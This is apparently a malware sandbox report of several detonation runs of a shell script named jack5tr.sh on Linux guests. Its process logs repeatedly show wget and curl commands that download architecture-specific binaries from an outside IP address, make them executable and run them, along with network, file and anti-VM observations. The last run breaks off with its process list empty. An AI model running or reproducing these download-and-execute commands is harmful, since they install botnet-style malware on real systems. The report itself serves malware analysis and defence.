[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh m68k mips mpsl ppc snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-C8WIzM gdm3-config-err-MO8hLs jack5tr.sh m68k mips mpsl ppc sh4 snap-private-tmp spc systemd-private-8202662168a748329c332a15329b16fc-ModemManager.service-jb5ElP systemd-private-8202662168a748329c332a15329b16fc-colord.service-KpNsD7 systemd-private-8202662168a748329c332a15329b16fc-polkit.service-f2eDNt systemd-private-8202662168a748329c332a15329b16fc-power-profiles-daemon.service-aFsFWI systemd-private-8202662168a748329c332a15329b16fc-switcheroo-control.service-adDzqa systemd-private-8202662168a748329c332a15329b16fc-systemd-logind.service-R54yfE systemd-private-8202662168a748329c332a15329b16fc-systemd-oomd.service-MmyGsz systemd-private-8202662168a748329c332a15329b16fc-systemd-resolved.service-UJC15i systemd-private-8202662168a748329c332a15329b16fc-systemd-timedated.service-2GUQAn systemd-private-8202662168a748329c332a15329b16fc-upower.service-nAcD3p x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

/tmp/mips

/tmp/arc

/tmp/x86_64

/tmp/mpsl

/tmp/arm

/tmp/arm5

/tmp/arm6

/tmp/arm7

/tmp/ppc

/tmp/spc

/tmp/m68k

/tmp/sh4

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:37

Platform

debian12-armhf-20240221-en

Max time kernel

8s

Max time network

310s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-95ee504168b8491395abd7d23b35057c-logrotate.service-4xrxzy systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-95ee504168b8491395abd7d23b35057c-ntpsec.service-WXGh0A systemd-private-95ee504168b8491395abd7d23b35057c-systemd-logind.service-2YPUWt systemd-private-95ee504168b8491395abd7d23b35057c-systemd-timedated.service-MEdYll x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-4 udp

Files

/tmp/x86

/tmp/mips

/tmp/arc

/tmp/x86_64

/tmp/mpsl

/tmp/arm

/tmp/arm5

/tmp/arm6

/tmp/arm7

/tmp/ppc

/tmp/spc

/tmp/m68k

/tmp/sh4

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:37

Platform

debian12-mipsel-20240221-en

Max time kernel

56s

Max time network

94s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-timedated.service-CdXlhk x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-230fbba8b3f7405b9b4a7c09d40065d5-systemd-logind.service-L93dsL x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 debian12-mipsel-20240221-en-5 udp

Files

/tmp/x86

/tmp/mips

/tmp/arc

/tmp/x86_64

/tmp/mpsl

/tmp/arm

/tmp/arm5

/tmp/arm6

/tmp/arm7

/tmp/ppc

/tmp/spc

/tmp/m68k

/tmp/sh4

Analysis: behavioral3

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

debian9-armhf-20240729-en

Max time kernel

14s

Max time network

16s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/bin/cat

[cat arc]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc systemd-private-09a898da445143038705e635ba526a90-systemd-timedated.service-6K6sBF x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

/tmp/mips

/tmp/arc

/tmp/x86_64

/tmp/mpsl

/tmp/arm

/tmp/RUN

/tmp/arm5

/tmp/arm6

/tmp/arm7

/tmp/ppc

/tmp/spc

/tmp/m68k

/tmp/sh4


Analysis: behavioral5

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

debian9-mipsel-20240418-en

Max time kernel

31s

Max time network

34s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/bin/cat

[cat x86]

/bin/chmod

[chmod +x jack5tr.sh RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/bin/cat

[cat arc]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x arc jack5tr.sh mips RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/bin/cat

[cat mpsl]

/bin/chmod

[chmod +x arc jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x arc arm jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x arc arm arm5 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x arc arm arm5 arm6 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/bin/cat

[cat ppc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh mips mpsl ppc RUN spc systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/bin/cat

[cat m68k]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN spc systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-MePW1d x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 jack5tr.sh m68k mips mpsl ppc RUN sh4 spc x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
NL 193.37.59.116:80 193.37.59.116 tcp

Files

/tmp/x86

/tmp/mips

/tmp/arc

/tmp/x86_64

/tmp/mpsl

/tmp/arm

/tmp/RUN

/tmp/arm5

/tmp/arm6

/tmp/arm7

/tmp/ppc

/tmp/spc

/tmp/m68k

/tmp/sh4


Analysis: behavioral8

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

2s

Max time network

131s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A

Processes

